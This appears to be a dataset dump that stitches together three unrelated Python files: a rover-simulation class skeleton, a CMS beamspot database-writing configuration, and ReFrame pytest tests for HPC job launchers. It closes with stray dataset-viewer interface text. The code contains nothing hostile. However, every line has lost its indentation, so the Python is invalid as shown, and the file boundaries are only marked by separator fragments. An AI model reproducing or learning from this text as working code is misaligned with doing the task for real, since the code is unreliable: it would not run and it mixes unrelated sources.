class Rover:
"""Contains the mechanism that controls the rover"""
def __init__(self):
self.default_battery_level = 100
self.battery_level = self.default_battery_level
self.location = [0.0, 0.0, 0.0]
self.battery_base_movement = 10
self.max_height_change = 100
self.mass = 185
def reset_battery(self):
self.battery_level = self.default_battery_level
def get_movement_direction(self):
# Logic for movement goes here. You are allowed to store whatever you want. You are not allowed to change any
# of the self variables. They are here for your information only. They will be adjusted by the simulation.
# direction must be set to NORTH, SOUTH, EAST, or WEST
direction = "NORTH"
# This must be the last statement in this function.
return direction
def move_rover(self, new_location):
battery_adjustment = compute_energy_drain(new_location, self.location, self)
self.location = new_location
self.battery_level = self.battery_level - battery_adjustment
|
py | 1a33203dc8492db600b550cf6557870a98196650 | import FWCore.ParameterSet.Config as cms
process = cms.Process("write2DB")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load("CondCore.CondDB.CondDB_cfi")
#################################
# Produce a SQLITE FILE
process.CondDB.connect = "SQLITEFILE"
#################################
process.PoolDBOutputService = cms.Service("PoolDBOutputService",
process.CondDB,
toPut = cms.VPSet(cms.PSet(record = cms.string('BeamSpotObjectsRcd'),
tag = cms.string('TAGNAME')
)
),
timetype = cms.untracked.string('TIMETYPE'),
loadBlobStreamer = cms.untracked.bool(False)
)
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(1))
process.beamspot = cms.EDAnalyzer("BeamSpotWrite2DB",
OutputFileName = cms.untracked.string('BEAMSPOTFILE')
)
process.p = cms.Path(process.beamspot)
# done.
|
py | 1a33205aefaf4012dee9098dd1520d45c89645f2 | # Copyright 2016-2020 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
import abc
import pytest
import reframe.core.launchers as launchers
from reframe.core.backends import getlauncher
from reframe.core.schedulers import Job, JobScheduler
@pytest.fixture(params=[
'alps', 'launcherwrapper', 'local', 'mpiexec',
'mpirun', 'srun', 'srunalloc', 'ssh', 'upcrun', 'upcxx-run'
])
def launcher(request):
if request.param == 'launcherwrapper':
# We set the registered_name for the LauncherWrapper just for
# convenience for the rest of the unit tests
wrapper_cls = launchers.LauncherWrapper
wrapper_cls.registered_name = 'launcherwrapper'
return wrapper_cls(
getlauncher('alps')(), 'ddt', ['--offline']
)
return getlauncher(request.param)()
@pytest.fixture
def make_job():
class FakeJobScheduler(JobScheduler):
def make_job(self, *args, **kwargs):
return Job(*args, **kwargs)
def emit_preamble(self, job):
pass
def submit(self, job):
pass
def wait(self, job):
pass
def cancel(self, job):
pass
def finished(self, job):
pass
def allnodes(self):
pass
def filternodes(self, job, nodes):
pass
def poll(self, *jobs):
pass
def _make_job(launcher, *args, **kwargs):
return Job.create(FakeJobScheduler(), launcher,
'fake_job', *args, **kwargs)
return _make_job
@pytest.fixture()
def job(make_job, launcher):
if type(launcher).registered_name == 'ssh':
access = ['-l user', '-p 22222', 'host']
else:
access = None
job = make_job(launcher,
script_filename='fake_script',
stdout='fake_stdout',
stderr='fake_stderr',
sched_access=access,
sched_exclusive_access='fake_exclude_access',
sched_options=['--fake'])
job.num_tasks = 4
job.num_tasks_per_node = 2
job.num_tasks_per_core = 1
job.num_tasks_per_socket = 1
job.num_cpus_per_task = 2
job.use_smt = True
job.time_limit = '10m'
job.options += ['--gres=gpu:4', '#DW jobdw anything']
job.launcher.options = ['--foo']
return job
@pytest.fixture
def minimal_job(make_job, launcher):
if type(launcher).registered_name == 'ssh':
access = ['host']
else:
access = None
minimal_job = make_job(launcher, sched_access=access)
minimal_job.launcher.options = ['--foo']
return minimal_job
def test_run_command(job):
launcher_name = type(job.launcher).registered_name
command = job.launcher.run_command(job)
if launcher_name == 'alps':
assert command == 'aprun -n 4 -N 2 -d 2 -j 0 --foo'
elif launcher_name == 'launcherwrapper':
assert command == 'ddt --offline aprun -n 4 -N 2 -d 2 -j 0 --foo'
elif launcher_name == 'local':
assert command == ''
elif launcher_name == 'mpiexec':
assert command == 'mpiexec -n 4 --foo'
elif launcher_name == 'mpirun':
assert command == 'mpirun -np 4 --foo'
elif launcher_name == 'srun':
assert command == 'srun --foo'
elif launcher_name == 'srunalloc':
assert command == ('srun '
'--job-name=fake_job '
'--time=0:10:0 '
'--output=fake_stdout '
'--error=fake_stderr '
'--ntasks=4 '
'--ntasks-per-node=2 '
'--ntasks-per-core=1 '
'--ntasks-per-socket=1 '
'--cpus-per-task=2 '
'--exclusive '
'--hint=multithread '
'--fake '
'--gres=gpu:4 '
'--foo')
elif launcher_name == 'ssh':
assert command == 'ssh -o BatchMode=yes -l user -p 22222 --foo host'
elif launcher_name == 'upcrun':
assert command == 'upcrun -N 2 -n 4 --foo'
elif launcher_name == 'upcxx-run':
assert command == 'upcxx-run -N 2 -n 4 --foo'
def test_run_command_minimal(minimal_job):
launcher_name = type(minimal_job.launcher).registered_name
command = minimal_job.launcher.run_command(minimal_job)
if launcher_name == 'alps':
assert command == 'aprun -n 1 --foo'
elif launcher_name == 'launcherwrapper':
assert command == 'ddt --offline aprun -n 1 --foo'
elif launcher_name == 'local':
assert command == ''
elif launcher_name == 'mpiexec':
assert command == 'mpiexec -n 1 --foo'
elif launcher_name == 'mpirun':
assert command == 'mpirun -np 1 --foo'
elif launcher_name == 'srun':
assert command == 'srun --foo'
elif launcher_name == 'srunalloc':
assert command == ('srun '
'--job-name=fake_job '
'--output=fake_job.out '
'--error=fake_job.err '
'--ntasks=1 '
'--foo')
elif launcher_name == 'ssh':
assert command == 'ssh -o BatchMode=yes --foo host'
elif launcher_name == 'upcrun':
assert command == 'upcrun -n 1 --foo'
elif launcher_name == 'upcxx-run':
assert command == 'upcxx-run -n 1 --foo'
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.